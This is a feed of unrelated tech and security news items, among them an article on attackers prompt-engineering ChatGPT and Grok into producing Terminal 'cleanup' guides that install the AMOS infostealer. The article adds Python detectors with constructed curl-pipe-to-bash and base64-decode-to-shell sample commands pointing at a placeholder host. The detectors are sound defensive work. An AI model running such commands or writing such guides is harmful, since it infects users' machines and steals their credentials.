Science parks anchoring Taiwan’s semiconductor industry were identified as another major focus. Facilities linked to advanced chip manufacturing, including firms such as TSMC, were subjected to repeated cyber intrusions. According to the report, attackers used various methods to steal advanced technologies and proprietary information.

Technology Competition and Beijing’s Strategic Goals

The bureau linked the cyber campaign to China’s broader economic and technological ambitions. The report said the attacks were “an attempt to support China’s self-reliance in technology and economic development and prevent China from being put in a disadvantaged position in the U.S.-China technology competition.”

Despite the detailed findings, China has consistently denied involvement. The Chinese government routinely rejects accusations related to hacking or cyber espionage. China’s Taiwan Affairs Office did not respond to a request for comment on the report.

Taiwanese officials argue that the sheer scale, timing, and coordination of the attacks point to an organized effort rather than isolated incidents. With the volume of attacks continuing to rise, the bureau warned that protecting digital infrastructure has become as critical as traditional military defense.
  •  

It’s hard to justify macOS Tahoe’s icons

We’ve talked about just how bad Apple’s regular icons have become, but what about the various icons Apple now plasters all over its menus, buttons, and dialogs? They’ve gotten so, so much worse.

In my opinion, Apple took on an impossible task: to add an icon to every menu item. There are just not enough good metaphors to do something like that.

But even if there were, the premise itself is questionable: if everything has an icon, it doesn’t mean users will find what they are looking for faster.

And even if the premise was solid, I still wish I could say: they did the best they could, given the goal. But that’s not true either: they did a poor job consistently applying the metaphors and designing the icons themselves.

↫ Nikita Prokopov

The number of detailed examples in this article is heartbreaking. I just don’t understand how anyone can look at even three of these and not immediately ring the alarm bells, slam the emergency brake, and rush to Tim Cook’s office. It further illustrates that no, the problem at Apple is not just one man, whether he be Jonathan Ive or Alan Dye or the next unfortunate bloke on the chopping block, but the institution as a whole. I have a feeling the kind of people who care about proper UI design have all left Apple by now. The institutional knowledge is gone.

And that kind of knowledge is extremely difficult to get back.

  •  

La Poste and La Banque Postale Hit by Cyberattack, Online Services Disrupted


French postal and banking services faced fresh disruptions on Thursday, January 1, 2026, following a cyberattack that temporarily rendered the websites and mobile applications of La Poste and La Banque Postale largely inaccessible, according to reports from French radio RFI.

A message on the La Poste homepage confirmed the situation, stating: “The laposte.fr website and all of La Poste’s information systems are currently facing a cyberattack.” Similarly, the online and mobile banking platforms of La Banque Postale, the post office’s banking arm, experienced downtime, preventing many customers from accessing services.

Repeated Denial-of-Service Attack on La Poste and La Banque Postale

This incident follows a previous denial-of-service (DDoS) attack that began on December 22, 2025, and continued until December 26. This kind of attack overloads servers to slow or block access; the December attack disrupted customers’ ability to track parcels but did not affect deliveries, which continued as normal.

Authorities confirmed that the pro-Russian hacker group NoName057(16) claimed responsibility for the December attack. La Poste filed a formal complaint, emphasizing that no customer data had been compromised, as denial-of-service attacks do not constitute unauthorized intrusion into information systems.

Investigations and Security Response

The Paris prosecutor’s office has opened an investigation into the latest La Poste cyberattack, delegating the case to the General Directorate for Internal Security (DGSI) and the national cyber unit. Authorities confirmed that the hacker group NoName057(16) had publicly claimed responsibility for the disruption.

The group, which emerged in 2022 after Russia invaded Ukraine, has previously targeted Ukrainian media, as well as government and corporate websites in countries including Poland, Sweden, and Germany.

Operational Impacts

During both attacks, digital access to La Poste services was limited, forcing some post offices to operate at reduced capacity. Despite the disruptions, customers were able to carry out essential postal services and banking transactions at physical locations.

La Poste communicated via Twitter that its teams were “fully mobilized to restore services as quickly as possible,” emphasizing that parcel deliveries continued and remediation efforts were ongoing.

Meanwhile, La Banque Postale acknowledged the cyberattack on social media, explaining: “A computer incident has temporarily made our mobile app and online banking inaccessible. Our teams are working to resolve the situation as quickly as possible. Online payments are possible with SMS authentication.”

Card payments at in-store terminals, ATM withdrawals, and SMS-authenticated online transactions remained functional, mitigating the overall impact on day-to-day financial activity.

Context of Cyber Incidents in France

The La Poste cyberattack comes amid a series of recent cyber incidents affecting public institutions in France. On December 17, 2025, authorities arrested a 22-year-old man in connection with a breach of France’s Interior Ministry, which involved unauthorized access to email accounts and confidential documents. The suspect faces potential prison time of up to 10 years.

Earlier, in November 2025, the French Football Federation reported a breach in which attackers exploited stolen credentials to access membership management software, exposing personal data of registered players nationwide.

While La Poste has not publicly attributed the latest cyberattack to a specific threat actor, the recurring incidents highlight the growing challenge of protecting critical public and financial infrastructure in France from denial-of-service attacks and other cyber threats.

The attacks on La Poste and La Banque Postale show how exposed postal and banking services are to this kind of disruption. No customer data was compromised, but online and mobile services were disrupted. Authorities, including the DGSI, are investigating, while both organizations work to restore full digital access. Customers should follow official channels for service updates.
  •  

The End of Excuses: 10 Cybersecurity Investments Every CISO Must Make by 2026


Coupang’s CEO resigned. Bed Bath & Beyond’s CTO stepped down. Two very different companies, two very similar stories: a massive breach, millions of exposed records, and executives suddenly facing the consequences. Park Dae-jun of Coupang called it a resignation, but everyone knew it was forced. Rafeh Masood’s departure at Bed Bath & Beyond came just days after a breach, leaving questions hanging in the air. These are not isolated incidents; they are a warning. For years, CISOs operated with a cushion. A breach? Brush it off. A delayed response? Justify it. A failing tool? Swap it out. That era is over.

By 2026, cybersecurity isn’t just about systems and alerts. It’s about governance, accountability, and real-world consequences. AI is moving faster than humans can react. Ransomware is clever, adaptive, and relentless. Regulators want proof, not excuses. Boards will no longer settle for “we’re still maturing.”

The hard truth: most security programs as they exist today will not survive 2026. CISOs are being forced to make hard choices: fewer tools, stricter controls, and investments that actually protect the business. Speed helps, but clarity and accountability matter far more.

Here are 10 technologies CISOs will invest in during 2026, not because they are trendy, but because without them, security leadership simply won’t exist.

1. AI-Driven Security Operations (AI-SOC)

Ransomware is no longer noisy, careless, or opportunistic. It is calculated.

As Dr Sheeba Armoogum, Associate Professor in Cybersecurity, University of Mauritius, explains to The Cyber Express, “By 2026, CISOs will prioritize investment in AI-driven security operations and identity-first security platforms to counter the rapid rise of AI-based ransomware and automated extortion attacks. Ransomware is no longer opportunistic; it is adaptive, identity-aware, and increasingly capable of evading traditional detection using AI techniques.”

This is the line CISOs must internalise: traditional SOC models are structurally obsolete.

Threats now move faster than human workflows can respond. Static rules, manual triage, and analyst-centric escalation chains break down when adversaries use AI to adapt in real time. As a result, CISOs are increasingly backing AI-native SOC platforms that operate through autonomous agents rather than dashboards and alerts.

Cyble Blaze AI exemplifies this shift. Built as an AI-native, multi-agent cybersecurity platform, Blaze AI enables continuous threat hunting, real-time correlation, and autonomous response, allowing security teams to identify and neutralize threats in seconds rather than hours. In practice, this moves security operations from reactive monitoring to machine-speed defense.

AI-SOC is not about replacing analysts; it is about re-architecting operations so humans supervise outcomes instead of chasing alerts. Behavioural analysis, automated decisioning, and immediate containment are no longer “advanced capabilities”—they are foundational.

Any CISO still relying on static rules and manual triage in 2026 will be explaining failure, not preventing it.

2. Identity-First Security Platforms

Perimeter security died quietly. Identity replaced it loudly.

Dr Armoogum makes the reason explicit: “At the same time, identity security controls such as continuous authentication and privileged access governance are critical, as most ransomware campaigns now begin with credential compromise rather than malware exploits.”

This is not a technical nuance; it is a strategic failure point. Most breaches do not break in; they log in.

In 2026, CISOs will invest in identity-first security because everything else depends on it. Human users, service accounts, APIs, workloads, and AI agents all require governance. If identity is weak, cloud controls, endpoint tools, and network defenses are cosmetic.

Identity is now the security control plane.

3. Privacy and Data Governance Platforms

Privacy failures no longer stay in legal departments—they land squarely on security leadership.

As Nikhil Jhanji, Principal Product Manager at Privy by IDfy, told The Cyber Express, “By 2026, CISOs will invest far more in privacy and data governance technologies that make compliance operational rather than aspirational.”

This is the pivot point. Policies and spreadsheets cannot scale to modern data flows. Regulators expect continuous accountability, consent traceability, and defensible evidence.

What matters, as Jhanji notes, is not just prevention: “What matters now is not just preventing incidents but being able to demonstrate responsible data handling at scale to regulators, boards, and customers.”

In 2026, privacy becomes a living control layer, not a compliance afterthought.

4. Continuous Exposure Management (CEM)

“Patch faster” has failed as a strategy.

Swati Bhate, Chief Information Security Officer and Chief Risk Officer, i-Source Infosystems Pvt. Ltd., delivers the most uncompromising view of what lies ahead in her LinkedIn post: “By 2026, the margin for error has hit zero.”

She makes the mandate clear: “Pre-emptive Blocking > Reactive Patching: Machine-speed attacks demand Continuous Exposure Management (CEM) to block non-compliant deployments automatically.”

This is not about improving hygiene; it is about stopping unsafe systems from existing at all. In 2026, environments that fail security baselines should never reach production.

Security becomes a gate, not a clean-up crew.

5. Confidential Computing and Silicon-Level Isolation

Cloud security tools have a blind spot, and attackers know it.

Bhate warns, “Attackers now target hypervisors to bypass guest OS defenses. Our baseline mandates silicon-level isolation and Confidential Computing.”

This is a direct challenge to CISOs who believe visibility equals control. If memory, workloads, and virtualization layers are exposed, traditional controls are irrelevant.

Confidential Computing moves trust down the stack, to hardware. In 2026, CISOs will invest here not for innovation, but because it closes an attack surface software cannot defend alone.

6. AI Governance and AI Risk Controls

Shadow AI is already out of control.

Bhate again is unequivocal: “Eliminate AI Exhaust: Shadow AI pilots leave unmonitored vector databases. In 2026, data without verified lineage is a liability—not an asset.”

AI governance tools will become mandatory, not optional. CISOs will need visibility into model usage, data provenance, and decision pathways to comply with the EU AI Act and NIS2.

As Bhate concludes: “The question is no longer how fast your AI can run—it’s whether you’ve built the brakes to keep it from taking the enterprise over a cliff.”

7. Security Platforms That Reduce Tool Sprawl

2025 exposed a hard truth: more tools did not mean more security.

As Manish Bakshi, National Sales Head – Professional Services, Ingram Micro, observed, “Fewer vendors worked better than too many tools.”

CISOs learned that speed without clarity creates fragility. In 2026, they will choose platforms and partners that understand business context and remain accountable after go-live.

Enterprise security buyers are no longer impressed by roadmaps. They want predictable outcomes.

8. Cloud-Native Security Platforms

Cloud misconfigurations are no longer accidents; they are liabilities.

CISOs will invest in cloud-native security platforms that continuously assess posture, identity exposure, and workload risk. These tools align with a growing sentiment from practitioners themselves. As one security practitioner noted on Reddit, “CISOs need people who understand identity, cloud, and how systems connect, not tool jockeys.”

Security in 2026 demands system thinking, not isolated controls.

9. Detection Engineering and SIEM Evolution

Alert volume is meaningless. Understanding is not.

As one security practitioner noted in a Reddit discussion on modern SOC skills, “Shallow alert clicker skills are fading.”

CISOs will invest in platforms and people who can map attack paths, tune detections, automate response, and explain impact in plain English. In 2026, detection engineering becomes a craft—not a checkbox.

10. Risk Quantification and Board-Ready Security Metrics

Finally, CISOs will invest in tools that translate cyber risk into business reality.

By 2026, security leaders will no longer be judged on how many threats they block, but on how clearly they can explain risk, impact, and trade-offs to the business. Boards are done with abstract heat maps and technical severity scores. They want to know what a risk costs, what reducing it achieves, and what happens if it is ignored.

This is where risk quantification platforms come into play. By framing cyber exposure in business terms, they allow CISOs to prioritize controls, justify investment decisions, and have credible, outcome-driven conversations at the executive level. Platforms such as Cyble Saratoga, which focus on moving organizations beyond subjective assessments toward measurable risk understanding, reflect this shift in how security decisions are made.

In 2026, outcomes will matter more than effort. CISOs who cannot quantify risk and articulate trade-offs will lose influence, and eventually relevance.

2026 Will Separate Cybersecurity Leaders From Security Operators

None of what’s coming in 2026 is surprising. The warning signs have been there for a while: breaches getting bigger, attacks getting smarter, regulators getting stricter, and boards getting far more involved than they used to be.

What is changing is tolerance. Tolerance for loose controls. Tolerance for fragmented tooling. Tolerance for security programs that can’t clearly explain what they’re protecting, why it matters, and what happens when things go wrong.

The technologies CISOs are investing in reflect that shift. Less experimentation. More control. Fewer tools, clearer accountability, and systems designed to prevent mistakes rather than explain them after the fact.

By 2026, cybersecurity won’t be about reacting faster. It will be about making fewer things possible in the first place, and making sure the people responsible can stand behind those decisions when it matters.
  •  

SoundCloud Confirms Cyberattack, Limited User Data Exposed


SoundCloud has confirmed a cyberattack on its platform after days of user complaints about service disruptions and connectivity problems. In what is being reported as a SoundCloud cyberattack, threat actors gained unauthorized access to one of its systems and exfiltrated a limited set of user data. “SoundCloud recently detected unauthorized activity in an ancillary service dashboard,” the company said. “Upon making this discovery, we immediately activated our incident response protocols and promptly contained the activity.”

Reports of trouble began circulating over several days, with users reporting that they were unable to connect to SoundCloud or experiencing access issues when using VPNs. After the disruptions persisted, the company issued a public statement on its website acknowledging the incident.

DoS Follows Initial SoundCloud Cyberattack

According to the music hosting service provider, the SoundCloud cyberattack was followed by a wave of denial-of-service attacks that further disrupted access to the platform. The company said it experienced multiple DoS incidents after the breach was contained, two of which were severe enough to take the website offline and prevent users from accessing the service altogether.

SoundCloud stated that it was ultimately able to repel the attacks, but the interruptions were enough to draw widespread attention from users and the broader technology community. These events highlighted the cascading impact of a cyberattack on SoundCloud, where an initial security compromise was compounded by availability-focused attacks designed to overwhelm the platform.

Scope of Exposed Data and User Impact

While the SoundCloud cyberattack raised immediate concerns about user privacy, the company stresses that the exposed data was limited. SoundCloud said its investigation found no evidence that sensitive information had been accessed.

“We understand that a purported threat actor group accessed certain limited data that we hold,” the company said. “We have completed an investigation into the data that was impacted, and no sensitive data (such as financial or password data) has been accessed.”

Instead, the data involved consisted of email addresses and information already visible on public SoundCloud profiles. According to the company, approximately 20 percent of SoundCloud users were affected by the breach.

Although SoundCloud described the data as non-sensitive, the scale of the exposure is notable. Email addresses can still be leveraged in phishing campaigns or social engineering attacks, even when other personal details remain secure.

SoundCloud added that it is confident the attackers’ access has been fully shut down. “We are confident that any access to SoundCloud data has been curtailed,” the company said.

Security Response and Ongoing Connectivity Issues

The company did not attribute the SoundCloud cyberattack to a specific hacking group but confirmed that it is working with third-party cybersecurity experts and has fully engaged its incident response protocols. As part of its remediation efforts, the company said it has enhanced monitoring and threat detection, reviewed and reinforced identity and access controls, and conducted a comprehensive audit of related systems.

Some of these security upgrades had unintended consequences. SoundCloud acknowledged that changes made to strengthen its defenses contributed to the VPN connectivity issues reported by users in recent days.

“We are actively working to resolve these VPN related access issues,” the company said.
  •  

Google ads funnel Mac users to poisoned AI chats that spread the AMOS infostealer

Researchers have found evidence that AI conversations were inserted in Google search results to mislead macOS users into installing the Atomic macOS Stealer (AMOS). Both Grok and ChatGPT were found to have been abused in these attacks.

Forensic investigation of an AMOS alert showed the infection chain started when the user ran a Google search for “clear disk space on macOS.” Following that trail, the researchers found not one, but two poisoned AI conversations with instructions. Their testing showed that similar searches produced the same type of results, indicating this was a deliberate attempt to infect Mac users.

The search results led to AI conversations which provided clearly laid out instructions to run a command in the macOS Terminal. That command would end with the machine being infected with the AMOS malware.

If that sounds familiar, you may have read our post about sponsored search results that led to fake macOS software on GitHub. In that campaign, sponsored ads and SEO-poisoned search results pointed users to GitHub pages impersonating legitimate macOS software, where attackers provided step-by-step instructions that ultimately installed the AMOS infostealer.

As the researchers pointed out:

“Once the victim executed the command, a multi-stage infection chain began. The base64-encoded string in the Terminal command decoded to a URL hosting a malicious bash script, the first stage of an AMOS deployment designed to harvest credentials, escalate privileges, and establish persistence without ever triggering a security warning.”

This is dangerous for the user on many levels. Because there is no prompt or review, the user never gets a chance to see or assess what the downloaded script will do before it runs. And because the whole thing goes through the command line, it sidesteps the normal file download protections and can execute anything the attacker wants.

Other researchers have found a campaign that combines elements of both attacks: the shared AI conversation and fake software install instructions. They found user guides for installing OpenAI’s new Atlas browser for macOS through shared ChatGPT conversations, which in reality led to AMOS infections.

So how does this work?

Most major chat interfaces (including Grok on X) also let users delete conversations or selectively share screenshots. That makes it easy for criminals to present only the polished, “helpful” part of a conversation and hide how they arrived there.

The cybercriminals used prompt engineering to get ChatGPT to generate a step‑by‑step “installation/cleanup” guide that, in reality, installs malware. ChatGPT’s sharing feature creates a public link to a conversation that lives in the owner’s account. Attackers can curate their conversations to create a short, clean conversation which they can share.

Then the criminals either pay for a sponsored search result pointing to the shared conversation or they use SEO techniques to get their posts high in the search results. Sponsored search results can be customized to look a lot like legitimate results. You’ll need to check who the advertiser is to find out it’s not real.

Image: a sponsored ad for ChatGPT Atlas which looks very real (image courtesy of Kaspersky)

From there, it’s a waiting game for the criminals. They rely on victims to find these AI conversations through search and then faithfully follow the step-by-step instructions.

How to stay safe

These attacks are clever and use legitimate platforms to reach their targets. But there are some precautions you can take.

  • First and foremost, and I can’t say this often enough: Don’t click on sponsored search results. We have seen so many cases where sponsored results lead to malware that we recommend skipping them or making sure you never see them. At best they cost the company you searched for money; at worst you fall prey to imposters.
  • If you’re thinking about following a sponsored advertisement, check the advertiser first. Is it the company you’d expect to pay for that ad? Click the three‑dot menu next to the ad, then choose options like “About this ad” or “About this advertiser” to view the verified advertiser name and location.
  • Use real-time anti-malware protection, preferably one that includes a web protection component.
  • Never run copy-pasted commands from random pages or forums, even if they’re hosted on seemingly legitimate domains, and especially not commands that look like curl … | bash or similar combinations.

Malwarebytes detects AMOS
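The last two points above (the hidden base64 URL in the Terminal command, and never running copy-pasted `curl … | bash` one-liners) can be turned into a pre-flight check. The following is an added example, not Malwarebytes’ code: it decodes any base64 fragments embedded in a pasted command and flags the decode-and-execute and pipe-to-shell idioms; the regexes, the `SAMPLE_COMMAND` and the `example.invalid` placeholder URL are all constructed for the demo.

```python
"""Triage helper for pasted "fix-it" Terminal one-liners.

Added example, not Malwarebytes' code: it shows what a copy-pasted
command would actually do before anyone runs it, by decoding embedded
base64 fragments and flagging the decode-and-execute and pipe-to-shell
idioms described in the article. Sample commands below are constructed.
"""
import base64
import re
from dataclasses import dataclass, field

# Runs of base64 alphabet long enough to hide a URL or script, not a flag.
B64_TOKEN = re.compile(r"(?<![A-Za-z0-9+/])[A-Za-z0-9+/]{16,}={0,2}(?![A-Za-z0-9+/=])")
URL = re.compile(r"https?://[^\s'\"<>)]+")

# Idioms that hand remote or hidden content straight to an interpreter.
PATTERNS = {
    "pipe-to-shell": re.compile(r"\|\s*(?:sudo\s+)?(?:ba|z|da)?sh\b"),
    "decode-to-shell": re.compile(r"\bbase64\s+(?:-d|-D|--decode)\b"),
    "process-substitution": re.compile(r"\$\(\s*(?:curl|wget)\b"),
    "remote-fetch": re.compile(r"\b(?:curl|wget)\b"),
}
# Finding kinds that on their own justify refusing to run the command.
HIGH = {"pipe-to-shell", "decode-to-shell", "process-substitution",
        "hidden-url", "hidden-script"}


@dataclass
class Finding:
    kind: str
    detail: str


@dataclass
class Report:
    command: str
    findings: list = field(default_factory=list)
    decoded_urls: list = field(default_factory=list)

    @property
    def verdict(self) -> str:
        kinds = {f.kind for f in self.findings}
        if kinds & HIGH:
            return "BLOCK"
        return "review" if kinds else "ok"


def try_decode(token: str):
    """Return the token's base64 decoding if it is readable text, else None."""
    try:
        text = base64.b64decode(token, validate=True).decode("utf-8")
    except (ValueError, UnicodeDecodeError):  # bad padding/alphabet or not text
        return None
    if not all(ch.isprintable() or ch in "\n\t" for ch in text):
        return None
    return text


def inspect_command(cmd: str) -> Report:
    """Collect risky idioms and the plaintext hidden in base64 fragments."""
    report = Report(cmd)
    for kind, pat in PATTERNS.items():
        m = pat.search(cmd)
        if m:
            report.findings.append(Finding(kind, m.group(0)))
    for tok in B64_TOKEN.findall(cmd):
        text = try_decode(tok)
        if text is None:
            continue
        urls = URL.findall(text)
        report.decoded_urls.extend(urls)
        if urls:
            report.findings.append(Finding("hidden-url", f"{tok[:12]}... decodes to {urls[0]}"))
        elif re.search(r"\b(?:curl|wget|chmod|xattr|osascript|nohup)\b", text):
            report.findings.append(Finding("hidden-script", text.splitlines()[0][:60]))
    return report


# Constructed samples. The URL is a placeholder, not a real indicator; the
# first command hides it in base64 and fetches and executes it in one step.
SAMPLE_URL = "https://example.invalid/fix-macos.sh"
_HIDDEN = base64.b64encode(SAMPLE_URL.encode()).decode()
SAMPLE_COMMAND = f'bash -c "$(curl -fsSL $(echo {_HIDDEN} | base64 -D))"'
BENIGN_COMMAND = "ls -la ~/Library/LaunchAgents"
REVIEW_COMMAND = "curl -O https://example.invalid/notes.txt"

if __name__ == "__main__":
    for cmd in (SAMPLE_COMMAND, BENIGN_COMMAND, REVIEW_COMMAND):
        r = inspect_command(cmd)
        print(f"[{r.verdict}] {cmd}")
        for f in r.findings:
            print(f"    {f.kind}: {f.detail}")
```

Paste any one-liner from a "fix" page into `inspect_command()`; a BLOCK verdict means the command fetches or decodes something and hands it straight to a shell without you ever seeing it.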

If you’ve scanned your Mac and found the AMOS information stealer:

  • Remove any suspicious login items, LaunchAgents, or LaunchDaemons from the Library folders to ensure the malware does not persist after reboot.
  • If any signs of persistent backdoor or unusual activity remain, strongly consider a full clean reinstall of macOS to ensure all malware components are eradicated. Only restore files from known clean backups. Do not reuse backups or Time Machine images that may be tainted by the infostealer.
  • After reinstalling, check for additional rogue browser extensions, cryptowallet apps, and system modifications.
  • Change all the passwords that were stored on the affected system and enable multi-factor authentication (MFA) for your important accounts.
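The first cleanup step above (reviewing LaunchAgents and LaunchDaemons) is easier with a helper that reads each plist and scores the traits a persistence entry left by an infostealer tends to combine. This is an added example, not Malwarebytes’ code or tooling: the heuristics, the two constructed plists and the `example.invalid` placeholder URL are assumptions made for the demo, and a hit is a prompt to look closer, not proof of infection.

```python
"""Triage helper for macOS launchd property lists.

Added example, not Malwarebytes' code: it parses LaunchAgent and
LaunchDaemon plists and flags traits an infostealer's persistence entry
tends to combine (interpreter as the program, inline fetch/decode, odd
launch paths, restart-on-kill). Both plists below are constructed.
"""
import plistlib
import re
from pathlib import Path
from xml.parsers.expat import ExpatError

# Where launchd looks for per-user and system-wide jobs.
LAUNCHD_DIRS = [
    Path.home() / "Library" / "LaunchAgents",
    Path("/Library/LaunchAgents"),
    Path("/Library/LaunchDaemons"),
]

INTERPRETERS = re.compile(r"(?:^|/)(?:(?:ba|z|da)?sh|python3?|perl|osascript)$")
# Locations a vendor installer has no business launching a job from.
ODD_PATHS = re.compile(r"^(?:/tmp|/private/tmp|/var/tmp|/Users/Shared|/Users/[^/]+/\.)")
INLINE_SCRIPT = re.compile(r"\b(?:curl|wget|base64|eval|nohup)\b|xattr\s+-d")
REVERSE_DNS = re.compile(r"^[A-Za-z0-9-]+(?:\.[A-Za-z0-9_-]+){2,}$")


def triage(plist_bytes: bytes, source: str = "<memory>") -> dict:
    """Score one launchd plist; 'suspicious' needs two independent reasons."""
    job = plistlib.loads(plist_bytes)
    args = list(job.get("ProgramArguments") or [])
    if not args and "Program" in job:
        args = [job["Program"]]
    reasons = []
    if args and INTERPRETERS.search(args[0]):
        reasons.append(f"program is an interpreter: {args[0]}")
    if INLINE_SCRIPT.search(" ".join(args[1:])):
        reasons.append("inline fetch/decode/eval in arguments")
    odd = next((a for a in args if ODD_PATHS.match(a)), None)
    if odd:
        reasons.append(f"launches from unusual path: {odd}")
    if job.get("RunAtLoad") and job.get("KeepAlive"):
        reasons.append("RunAtLoad + KeepAlive: restarts if killed")
    label = str(job.get("Label", ""))
    if not REVERSE_DNS.match(label):
        reasons.append(f"label is not reverse-DNS style: {label!r}")
    return {"source": source, "label": label, "program_arguments": args,
            "reasons": reasons, "suspicious": len(reasons) >= 2}


def scan_launchd_dirs(dirs=LAUNCHD_DIRS) -> list:
    """Triage every plist in the launchd folders; unreadable files are reported, not fatal."""
    results = []
    for d in dirs:
        if not d.is_dir():
            continue
        for p in sorted(d.glob("*.plist")):
            try:
                results.append(triage(p.read_bytes(), str(p)))
            except (OSError, ValueError, ExpatError, plistlib.InvalidFileException) as exc:
                results.append({"source": str(p), "label": "", "program_arguments": [],
                                "reasons": [f"unparseable plist: {exc}"], "suspicious": True})
    return results


# Constructed sample: the shape a dropper leaves behind (placeholder URL only).
SUSPICIOUS_PLIST = b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0">
<dict>
  <key>Label</key><string>com.update.helper</string>
  <key>ProgramArguments</key>
  <array>
    <string>/bin/bash</string>
    <string>-c</string>
    <string>curl -fsSL https://example.invalid/PLACEHOLDER | base64 -d | bash</string>
  </array>
  <key>RunAtLoad</key><true/>
  <key>KeepAlive</key><true/>
</dict>
</plist>
"""

# Constructed sample: an ordinary vendor agent launched from its app bundle.
BENIGN_PLIST = b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0">
<dict>
  <key>Label</key><string>com.example.vendor.agent</string>
  <key>ProgramArguments</key>
  <array>
    <string>/Applications/Vendor.app/Contents/MacOS/agent</string>
    <string>--background</string>
  </array>
  <key>RunAtLoad</key><true/>
</dict>
</plist>
"""

if __name__ == "__main__":
    for r in scan_launchd_dirs() or [triage(SUSPICIOUS_PLIST), triage(BENIGN_PLIST)]:
        flag = "SUSPICIOUS" if r["suspicious"] else "ok"
        print(f"[{flag}] {r['source']} {r['label']}: {'; '.join(r['reasons']) or '-'}")
```

Run it on the Mac being cleaned (or feed it plists copied off the machine); anything marked SUSPICIOUS deserves a look at the referenced program before the entry is removed, so the dropped files it points to can be deleted too.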

If all this sounds too difficult for you to do yourself, ask someone or a company you trust to help you—our support team is happy to assist you if you have any concerns.



  •  

The anatomy of a macOS application

When Mac OS X was designed, it switched to the bundle structure inherited from NeXTSTEP. Instead of this multitude of resources, apps consisted of a hierarchy of directories containing files of executable code, and those with what had in Mac OS been supporting resources. Those app bundles came to adopt a standard form, shown below.

↫ Howard Oakley

A short, but nonetheless informative overview of the structure of a macOS application. I’m sure most people on OSNews are aware that a macOS application is a bundle, which is effectively a glorified directory containing a variety of files and subdirectories that together make up the application. I haven’t used macOS in a while, but I think you can right-click on an application and open it as a folder to dig around inside of it.

I’m trying to remember from my days as a Mac OS X user – 15-20 years ago – if there was ever a real need to do so, but I’m sure there were a few hacks you could do by messing around with the files inside of application bundles. These days, perhaps with all the code-signing, phoning-home to Apple, and other security trickery going on, such acts are quite frowned upon. Does making any otherwise harmless changes inside an application bundle set off a ton of alarm bells in macOS these days?

  •  

Redox takes first baby steps towards a modesetting driver for Intel graphics

An exciting tidbit of news from Redox, the Rust-based operating system. Its founder and lead developer Jeremy Soller has merged the first changes for a modesetting driver for Intel graphics.

After a few nights of reading through thousands of pages of PRMs I have finally implemented a modesetting driver for Intel HD graphics on Redox OS. There is much more to do, but there is now a clear path to native hardware accelerated graphics!

↫ Jeremy Soller

Of course, all the usual disclaimers apply, but it’s an important first step, and once again underlines that Redox is turning into a very solid platform that might just be on the cusp of becoming something we can use every day.

  •  

MacOS: losing confidence

It’s always a bit sad and a little awkward when reality starts hitting long-time fans and users of an operating system, isn’t it? I feel like I’m at least fifteen years ahead of everyone else when it comes to macOS, at least.

Over the last few weeks I’ve been discovering problems that have been eroding confidence in macOS. From text files that simply won’t show up in Spotlight search, to Clock timers that are blank and don’t function, there’s one common feature: macOS encounters an error or fault, but doesn’t report that to the user, instead just burying it deep in the log.

When you can spare the time, the next step is to contact Apple Support, who seem equally puzzled. You’re eventually advised to reinstall macOS or, in the worst case, to wipe a fairly new Apple silicon Mac and restore it in DFU mode, but have no reason to believe that will stop the problem from recurring. You know that Apple Support doesn’t understand what’s going wrong, and despite the involvement of support engineers, they seem as perplexed as you.

↫ Howard Oakley

I remember when Mac OS X was so far ahead of the competition it was honestly a little tragic. Around the late PowerPC and very early Intel days, when the iPhone hadn’t yet had the impact on the company it has now, the Mac and its operating system were the star of the company’s show, and you felt it when you used it. Even though the late PowerPC hardware was being outpaced left, right, and centre by Intel and AMD hardware in virtually every sense, Mac OS X more than made up for it by being a carefully and lovingly crafted operating system designed and developed by people who clearly deeply cared.

I used nothing but Macs as a result.

These days, everything’s reversed. By all accounts, Macs are doing amazing hardware-wise, with efficient, powerful processors and solid design. The operating system, however, has become a complete and utter mess, showing us that no, merely having great hardware does not make up for shit software in the same way the reverse was true two decades ago. I’d rather use a slower, hotter laptop with great software than a faster, cooler laptop with terrible software.

I’m not sure we’re going to see this trend reversed any time soon. Apple, too, is chasing the dragon, and everything the company does is designed around their cash cow, and I just don’t see how that’s going to change without a complete overhaul of the company’s leadership.

  •  

System 7 natively boots on the Mac Mini G4

Only a few weeks ago, the CHRP variants of Mac OS 7.6 and 8 were discovered and uploaded to the internet for posterity, but we’re already seeing the positive results of this event unfold: Mac OS 7.x can now run on the Mac Mini G4 – natively.

The very short of it is as follows. First, the CHRP release of Mac OS 8 contains a ROM file that allows Mac OS 8 to boot on the G4 Mac Mini. Second, the CHRP release of 7.6 contains a System Enabler that allows 7.6 and earlier versions to run by using the aforementioned ROM file. Third, the ROM has been modified to add compatibility with as many Mac models as possible. There’s a lot more to it, of course, but the end result is that quite a few more older, pre-9.x versions of Mac OS can now run on G4 and G3 Macs, which is quite cool.

Of course, there are limitations.

Note that, although I describe many of these as “stable”, I mean you can use much of it normally (sound/video/networking aside) without it crashing or misbehaving, at least not too hard, but that is not to say everything works, because that is just not the case. For example, when present, avoid opening the Apple System Profiler, unless you want a massive crash as it struggles trying to profile and gather all the information about your system. Some other apps or Control Panels might either not work, or work up to a certain point, after which they might freeze, requiring you to Force Quit the Finder to keep on going. And so on.

↫ Jubadub at Mac OS 9 Lives

Issues or no, this is amazing news, and great work by all involved.

  •  

DDoS Botnet Aisuru Blankets US ISPs in Record DDoS

The world’s largest and most disruptive botnet is now drawing a majority of its firepower from compromised Internet-of-Things (IoT) devices hosted on U.S. Internet providers like AT&T, Comcast and Verizon, new evidence suggests. Experts say the heavy concentration of infected devices at U.S. providers is complicating efforts to limit collateral damage from the botnet’s attacks, which shattered previous records this week with a brief traffic flood that clocked in at nearly 30 trillion bits of data per second.

Since its debut more than a year ago, the Aisuru botnet has steadily outcompeted virtually all other IoT-based botnets in the wild, with recent attacks siphoning Internet bandwidth from an estimated 300,000 compromised hosts worldwide.

The hacked systems that get subsumed into the botnet are mostly consumer-grade routers, security cameras, digital video recorders and other devices operating with insecure and outdated firmware, and/or factory-default settings. Aisuru’s owners are continuously scanning the Internet for these vulnerable devices and enslaving them for use in distributed denial-of-service (DDoS) attacks that can overwhelm targeted servers with crippling amounts of junk traffic.

As Aisuru’s size has mushroomed, so has its punch. In May 2025, KrebsOnSecurity was hit with a near-record 6.35 terabits per second (Tbps) attack from Aisuru, which was then the largest assault that Google’s DDoS protection service Project Shield had ever mitigated. Days later, Aisuru shattered that record with a data blast in excess of 11 Tbps.

